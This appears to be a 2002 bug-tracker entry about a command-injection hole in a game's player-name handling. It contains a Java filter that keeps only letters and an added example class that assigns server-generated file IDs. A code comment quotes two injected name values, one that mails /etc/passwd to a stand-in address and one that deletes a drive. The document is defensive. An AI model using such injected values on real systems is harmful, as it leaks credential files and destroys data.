
#1 Player File Vulnerability

Crash_Bug
open
nobody
Source Code (1)
5
2002-01-03
2002-01-03
No
    // Parse entered name
    case STATE_PARSE_NAME:
    {
        // Make sure name contains only letters for fantasy names and
        // to prevent malicious input (such as the name
        // "| mail -x hacker@spoof < /etc/passwd" or
        // "; deltree C:\; mkdir C:\Hahaha")
        char[] commandArray = command.toCharArray();
        command = "";
        for (int i = 0; i < commandArray.length; i++) {
            if (Character.isLetter(commandArray[i])) {
                command += commandArray[i];
            }
        }

        // This should fix the problem. An alternative method would be to
        // maintain a serialized look-up table where the server generates
        // unique IDs for player files.
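
The alternative mentioned in the report, a look-up table in which the server generates the IDs used for player files, shown as an added example that is not code from the project or the reporter. The class name, the 16-letter limit, the case-insensitive key, the `.dat` suffix, the `players` directory and the in-memory map standing in for the serialized table are assumptions; unlike the filter above, it rejects a bad name instead of stripping characters from it.

```java
import java.nio.file.Path;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical helper, not part of the project: maps validated player names to
// server-generated file IDs so that typed input never becomes part of a path.
public class PlayerFileIndex {
    private static final int MAX_NAME_LENGTH = 16;   // assumed limit
    private final Path baseDir;
    private final Map<String, String> idsByName = new ConcurrentHashMap<>();

    public PlayerFileIndex(Path baseDir) { this.baseDir = baseDir; }

    // Reject instead of silently stripping, so "ab;cd" and "abcd" cannot collide.
    static String validateName(String raw) {
        if (raw == null || raw.isEmpty() || raw.length() > MAX_NAME_LENGTH) {
            throw new IllegalArgumentException("name must be 1-" + MAX_NAME_LENGTH + " letters");
        }
        for (int i = 0; i < raw.length(); i++) {
            if (!Character.isLetter(raw.charAt(i))) {
                throw new IllegalArgumentException("name may contain only letters");
            }
        }
        return raw.toLowerCase(Locale.ROOT);         // assumed: names are case-insensitive
    }

    // The file name is a random UUID chosen by the server, never the typed name.
    public Path fileFor(String rawName) {
        String key = validateName(rawName);
        String id = idsByName.computeIfAbsent(key, k -> UUID.randomUUID().toString());
        return baseDir.resolve(id + ".dat");
    }

    public static void main(String[] args) {
        PlayerFileIndex index = new PlayerFileIndex(Path.of("players"));
        // Constructed input; the last entry is the second name quoted in the report.
        String[] samples = {"Gandalf", "gandalf", "; deltree C:\\; mkdir C:\\Hahaha"};
        for (String s : samples) {
            try {
                System.out.println(s + " -> " + index.fileFor(s).getFileName());
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```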
